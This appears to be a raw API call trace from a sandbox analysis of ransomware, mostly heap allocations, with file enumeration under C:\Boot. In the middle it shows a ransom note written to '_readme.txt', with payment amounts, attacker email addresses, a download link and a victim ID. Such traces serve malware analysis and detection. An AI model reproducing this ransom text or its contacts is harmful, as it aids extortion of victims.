RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83fc0 [0187.997] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e776e0 [0187.997] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0187.998] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83fc0 | out: hHeap=0x620000) returned 1 [0187.998] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83fc0 [0187.998] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e776e0 [0187.998] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0187.998] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83fc0 | out: hHeap=0x620000) returned 1 [0187.998] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83fc0 [0187.998] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e776e0 [0187.999] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0187.999] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83fc0 | out: hHeap=0x620000) returned 1 [0187.999] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83fc0 [0187.999] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e776e0 [0188.000] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0188.000] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83fc0 | out: hHeap=0x620000) returned 1 [0188.000] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83fc0 [0188.000] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e776e0 [0188.000] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0188.000] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83fc0 | out: hHeap=0x620000) returned 1 [0188.001] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83fc0 [0188.001] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e776e0 [0188.001] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0188.001] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83fc0 | out: hHeap=0x620000) returned 1 [0188.001] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83fc0 [0188.001] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e776e0 [0188.002] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0188.002] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83fc0 | out: hHeap=0x620000) returned 1 [0188.002] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83fc0 [0188.002] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e776e0 [0188.002] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0188.002] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83fc0 | out: hHeap=0x620000) returned 1 [0188.002] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83fc0 [0188.003] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e776e0 [0188.003] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0188.003] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83fc0 | out: hHeap=0x620000) returned 1 [0188.003] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83fc0 [0188.003] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e776e0 [0188.003] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0188.004] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83fc0 | out: hHeap=0x620000) returned 1 [0188.004] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83fc0 [0188.004] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e776e0 [0188.004] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0188.005] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83fc0 | out: hHeap=0x620000) returned 1 [0188.005] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83fc0 [0188.005] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e776e0 [0188.005] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0188.005] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83fc0 | out: hHeap=0x620000) returned 1 [0188.005] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83fc0 [0188.005] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e776e0 [0188.005] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x2e902a8 [0188.006] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0188.006] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e902a8 | out: hHeap=0x620000) returned 1 [0188.006] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83fc0 | out: hHeap=0x620000) returned 1 [0188.007] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83fc0 [0188.007] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e776e0 [0188.007] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0188.007] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83fc0 | out: hHeap=0x620000) returned 1 [0188.007] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83fc0 [0188.007] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e776e0 [0188.007] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc2e) returned 0x2e902a8 [0188.008] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0188.008] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e902a8 | out: hHeap=0x620000) returned 1 [0188.008] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83fc0 | out: hHeap=0x620000) returned 1 [0188.008] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83fc0 [0188.009] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e776e0 [0188.009] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0188.009] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83fc0 | out: hHeap=0x620000) returned 1 [0188.009] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83fc0 [0188.009] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e776e0 [0188.010] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0188.010] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83fc0 | out: hHeap=0x620000) returned 1 [0188.010] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83fc0 [0188.010] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e776e0 [0188.010] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0188.011] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83fc0 | out: hHeap=0x620000) returned 1 [0188.011] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83fc0 [0188.011] PathFindFileNameW (pszPath="C:\\Boot\\el-GR\\") returned="el-GR\\" [0188.011] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0188.011] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83f98 | out: hHeap=0x620000) returned 1 [0188.011] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0188.011] PathFindFileNameW (pszPath="") returned="" [0188.011] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x74ff0000 [0188.012] GetProcAddress (hModule=0x74ff0000, lpProcName="SHGetFolderPathW") returned 0x75075708 [0188.012] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x2e902a8 | out: pszPath="C:\\Users\\kEecfMwgj") returned 0x0 [0188.013] FreeLibrary (hLibModule=0x74ff0000) returned 1 [0188.013] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83fc0 | out: hHeap=0x620000) returned 1 [0188.013] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e902a8 | out: hHeap=0x620000) returned 1 [0188.014] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.014] PathAppendW (in: pszPath="C:\\Boot\\el-GR\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\el-GR\\_readme.txt") returned 1 [0188.014] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0188.014] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.014] PathFileExistsW (pszPath="C:\\Boot\\el-GR\\_readme.txt") returned 0 [0188.014] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x7d00) returned 0x2e96a68 [0188.014] lstrcpyW (in: lpString1=0x2e96a68, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd" [0188.014] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd", lpString2="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531JhyjduyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531JhyjduyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt" [0188.014] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e77f68 [0188.014] CreateFileW (lpFileName="C:\\Boot\\el-GR\\_readme.txt" (normalized: "c:\\boot\\el-gr\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0188.015] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e77f68 | out: hHeap=0x620000) returned 1 [0188.015] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e96a68 | out: hHeap=0x620000) returned 1 [0188.015] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0188.015] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.015] FindFirstFileW (in: lpFileName="C:\\Boot\\el-GR\\*" (normalized: "c:\\boot\\el-gr\\*"), lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x95683fe0, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28d5e380, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0x28d5e380, ftLastWriteTime.dwHighDateTime=0x1d706aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cfe100 [0188.016] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.016] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x95683fe0, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28d5e380, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0x28d5e380, ftLastWriteTime.dwHighDateTime=0x1d706aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0188.016] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x95683fe0, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28d5e380, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0xea239054, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x17250, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0188.016] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.016] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2cddd80 [0188.016] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.016] PathFindExtensionW (pszPath="C:\\Boot\\el-GR\\bootmgr.exe.mui") returned=".mui" [0188.017] CreateFileW (lpFileName="C:\\Boot\\el-GR\\bootmgr.exe.mui" (normalized: "c:\\boot\\el-gr\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0188.025] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cddd80 | out: hHeap=0x620000) returned 1 [0188.026] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x95683fe0, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28d5e380, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0xea239054, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x17250, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0188.026] FindClose (in: hFindFile=0x2cfe100 | out: hFindFile=0x2cfe100) returned 1 [0188.026] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0188.026] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83fe8 | out: hHeap=0x620000) returned 1 [0188.026] PeekMessageW (in: lpMsg=0x312ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x312ff08) returned 0 [0188.026] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83fe8 [0188.026] PeekMessageW (in: lpMsg=0x312fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x312fb74) returned 0 [0188.026] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.026] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0188.027] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0188.027] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.027] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.027] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0188.028] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0188.028] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.028] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.028] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0188.028] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0188.029] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.029] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.029] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0188.029] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0188.029] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.029] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.029] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0188.030] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0188.030] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.030] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.030] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0188.030] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0188.030] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.031] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.031] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0188.031] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc2e) returned 0x2e902a8 [0188.031] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0188.031] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e902a8 | out: hHeap=0x620000) returned 1 [0188.032] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.032] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.032] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0188.032] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0188.032] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.032] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.032] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0188.033] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0188.033] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.033] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.033] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e765d0 [0188.033] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0188.034] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.034] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.034] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e765d0 [0188.034] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0188.035] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.035] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.035] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0188.035] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0188.036] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.036] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.036] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0188.036] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0188.037] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.037] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.037] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0188.037] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0188.038] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.038] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.038] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0188.038] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0188.039] 